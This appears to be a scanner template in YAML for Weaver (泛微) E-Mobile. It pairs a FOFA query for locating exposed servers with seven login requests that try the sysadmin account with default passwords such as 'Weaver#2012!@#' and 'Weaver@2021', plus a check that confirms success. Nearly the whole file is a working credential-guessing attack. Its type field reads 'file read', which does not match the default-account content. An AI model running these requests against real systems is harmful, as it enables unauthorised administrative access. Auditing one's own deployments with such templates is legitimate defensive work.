product: 泛微 E-Mobile
vName: 泛微E-Mobile 默认账户
type: 文件读取
vID: [ ]
level: 2
vDesc: 泛微E-Mobile可能存在默认账户密码未修改的情况。
version: ''
note: ''
search:
  FOFA: app="泛微-EMobile"
protocol: http
link: ''
fix:
  - 更改密码为强口令
model: ''
logic: or
exploit:
  - exp:
      method: post
      follow: false
      path: /emp/passport/login
      json: { "captcha_text": "","client_type": 2,"login_type": 1,"loginid": "sysadmin","key": "69f90b01-0154-47ec-b9c2-9366390965ce","client_version": "7.0.39.20200221","password": "1","client_model": "iPhone12,1","device_name": "iPhone","device_id": "a623863a-817e-4e4a-b687-f01b6b258e66","os_version": "13.3.1","lang_type": "zh" }
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - <R>
              - <errcode>
              - <avatar>
            logic: and
  - exp:
      method: post
      follow: false
      path: /emp/passport/login
      json: { "captcha_text": "","client_type": 2,"login_type": 1,"loginid": "sysadmin","key": "69f90b01-0154-47ec-b9c2-9366390965ce","client_version": "7.0.39.20200221","password": "Weaver#2012!@#","client_model": "iPhone12,1","device_name": "iPhone","device_id": "a623863a-817e-4e4a-b687-f01b6b258e66","os_version": "13.3.1","lang_type": "zh" }
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - <R>
              - <errcode>
              - <avatar>
            logic: and
  - exp:
      method: post
      follow: false
      path: /emp/passport/login
      json: { "captcha_text": "","client_type": 2,"login_type": 1,"loginid": "sysadmin","key": "69f90b01-0154-47ec-b9c2-9366390965ce","client_version": "7.0.39.20200221","password": "Weaver@2001","client_model": "iPhone12,1","device_name": "iPhone","device_id": "a623863a-817e-4e4a-b687-f01b6b258e66","os_version": "13.3.1","lang_type": "zh" }
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - <R>
              - <errcode>
              - <avatar>
            logic: and
  - exp:
      method: post
      follow: false
      path: /emp/passport/login
      json: { "captcha_text": "","client_type": 2,"login_type": 1,"loginid": "sysadmin","key": "69f90b01-0154-47ec-b9c2-9366390965ce","client_version": "7.0.39.20200221","password": "Weaver@2020","client_model": "iPhone12,1","device_name": "iPhone","device_id": "a623863a-817e-4e4a-b687-f01b6b258e66","os_version": "13.3.1","lang_type": "zh" }
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - <R>
              - <errcode>
              - <avatar>
            logic: and
  - exp:
      method: post
      follow: false
      path: /emp/passport/login
      json: { "captcha_text": "","client_type": 2,"login_type": 1,"loginid": "sysadmin","key": "69f90b01-0154-47ec-b9c2-9366390965ce","client_version": "7.0.39.20200221","password": "Weaver@2021","client_model": "iPhone12,1","device_name": "iPhone","device_id": "a623863a-817e-4e4a-b687-f01b6b258e66","os_version": "13.3.1","lang_type": "zh" }
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - <R>
              - <errcode>
              - <avatar>
            logic: and
  - exp:
      method: post
      follow: false
      path: /emp/passport/login
      json: { "captcha_text": "","client_type": 2,"login_type": 1,"loginid": "sysadmin","key": "69f90b01-0154-47ec-b9c2-9366390965ce","client_version": "7.0.39.20200221","password": "Weaver@2022","client_model": "iPhone12,1","device_name": "iPhone","device_id": "a623863a-817e-4e4a-b687-f01b6b258e66","os_version": "13.3.1","lang_type": "zh" }
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - <R>
              - <errcode>
              - <avatar>
            logic: and
  - exp:
      method: post
      follow: false
      path: /emp/passport/login
      json: { "captcha_text": "","client_type": 2,"login_type": 1,"loginid": "sysadmin","key": "69f90b01-0154-47ec-b9c2-9366390965ce","client_version": "7.0.39.20200221","password": "Weaver@2023","client_model": "iPhone12,1","device_name": "iPhone","device_id": "a623863a-817e-4e4a-b687-f01b6b258e66","os_version": "13.3.1","lang_type": "zh" }
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - <R>
              - <errcode>
              - <avatar>
            logic: and